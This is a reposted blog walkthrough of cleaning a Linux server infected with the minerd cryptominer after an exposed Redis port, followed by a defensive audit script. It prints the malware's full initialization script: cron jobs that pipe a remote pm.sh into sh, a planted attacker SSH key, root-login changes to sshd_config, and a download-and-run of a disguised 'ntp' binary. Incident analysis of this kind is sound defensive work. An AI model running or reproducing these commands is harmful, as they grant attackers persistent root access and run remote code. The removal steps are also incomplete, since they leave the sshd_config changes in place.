Complete cleanup procedure after a Linux server is infected with minerd (detailed walkthrough)

Reposted. Author: qq735679552. Updated: 2022-09-27 22:32:09

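I carelessly installed a Redis service and left its default port open to the whole internet. At first I thought this server had no public IP address; by the time I found out otherwise, it was too late for regrets.

One day I noticed the CPU load was abnormally high and found a minerd process consuming most of the CPU. After some googling I realized the server had been compromised.

The cleanup process follows.

Step one

1. Immediately stop the Redis service, change the port permissions, and add password protection.

2. Following information found online, delete the two crontab files:

sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root

3. Know your enemy: study the malware's initialization script.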

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
     fi
fi
 
/etc/init.d/ntp start
 
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

From this we get the following.

1. Delete the crontab files, which we already did above. The code involved:

echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root

2. Delete these files; they are used for passwordless login:

rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/KHK75NEOiq

You could even delete the whole .ssh directory. The code involved:

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi

3. Delete the /opt/ directory; its contents are produced by the service in step 4.

4. Delete the service:

service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp

The code involved:

if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
     fi
fi

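The code above downloads an 8 MB program and installs something. I don't know what it is either, but the next line gives it away:

/etc/init.d/ntp start

This line starts the ntp service. A Baidu search says it is a time service, but here it is actually the malware's service. Opening this file leads to the executable /usr/sbin/ntp, and that file turns out to be byte-for-byte identical to the 8 MB file.

So delete this file.

Finally:

ps aux|grep minerd

Kill all of those processes. OK, the repair is complete.

Half an hour later:

ps aux|grep minerd

The minerd process no longer appears.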
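A read-only audit for the artifacts this walkthrough deals with, as an added example that is not part of the original post; it also reports the sshd_config lines the script appends, which the steps above leave in place. The function name audit_root and the finding labels are made up for this example.

```shell
#!/bin/sh
# Added example (not from the original post): read-only audit for the
# persistence artifacts the pm.sh script above leaves behind.
# audit_root ROOT prints one finding per line; ROOT defaults to "/".
audit_root() {
    root=${1:-/}; root=${root%/}

    # 1. root crontabs that pipe a download straight into a shell
    for f in "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root"; do
        [ -f "$f" ] || continue
        grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$f" && echo "cron-pipe-to-shell $f"
    done

    # 2. sshd_config lines appended by the script: root login enabled and
    #    AuthorizedKeysFile redirected away from authorized_keys
    cfg="$root/etc/ssh/sshd_config"
    if [ -f "$cfg" ]; then
        awk -v f="$cfg" '
            /^[ \t]*#/ { next }
            tolower($1) == "permitrootlogin" && tolower($2) == "yes" { print "root-login-enabled " f ":" NR }
            tolower($1) == "authorizedkeysfile" && $0 !~ /authorized_keys/ { print "keyfile-redirected " f ":" NR " -> " $2 }
        ' "$cfg"
    fi

    # 3. service binary that is byte-identical to a file dropped in /opt
    #    (the post found /usr/sbin/ntp identical to the downloaded file)
    svc="$root/usr/sbin/ntp"
    if [ -f "$svc" ]; then
        for f in "$root"/opt/*; do
            [ -f "$f" ] && cmp -s "$f" "$svc" && echo "dropped-binary-copy $f == $svc"
        done
    fi
    return 0
}
```

Call it as `audit_root /` on the live host, or pass the mount point of a disk image to inspect the system offline.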
